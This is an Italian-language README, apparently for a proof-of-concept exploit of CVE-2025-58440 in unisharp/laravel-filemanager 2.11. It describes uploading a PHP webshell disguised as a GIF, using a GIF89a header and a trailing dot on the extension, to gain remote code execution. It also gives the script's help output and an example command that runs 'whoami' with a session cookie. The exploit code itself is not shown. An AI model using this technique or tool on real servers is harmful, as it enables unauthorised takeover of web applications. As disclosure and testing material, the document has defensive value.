
Esecuzione Remota di Codice (RCE) tramite Attacco File Poliglotta e Iniezione di Byte Nulli su Laravel FileManager
Esecuzione di codice remoto (RCE) tramite attacco di file poliglotta e iniezione di byte nulli su Laravel FileManager
Il pacchetto unisharp/laravel-filemanager versione 2.11 è vulnerabile a Esecuzione di codice remoto (RCE) a causa di una convalida impropria del tipo di file durante il caricamento. La vulnerabilità consente a un attaccante di caricare un file PHP malevolo camuffato da immagine GIF sfruttando la convalida dell'estensione del file. In particolare, l'attaccante può aggiungere un punto (.) all'estensione .php e includere l'intestazione GIF89a; per far apparire il file come un'immagine, bypassando i controlli di convalida. Ciò consente all'attaccante di eseguire codice PHP arbitrario sul server, portando a Esecuzione di codice remoto (RCE).
python3 CVE-2025-58440.py <target> [--flags]
Laravel File Manager Exploit (CVE-2025-58440)
positional arguments:
target Target URL (e.g., 127.0.0.1:8000)
options:
-h, --help show this help message and exit
-C, --cookie COOKIE Session cookies
-d, --directory DIRECTORY Working directory (default: /tmp)
-f, --filename FILENAME Filename to upload (default: random)
-p, --payload COMMAND Command to execute through the webshell (e.g., 'id', 'whoami') (default: id)
python3 CVE-2025-58440.py 127.0.0.1:8000 -C "laravel-session=value" -p "whoami"
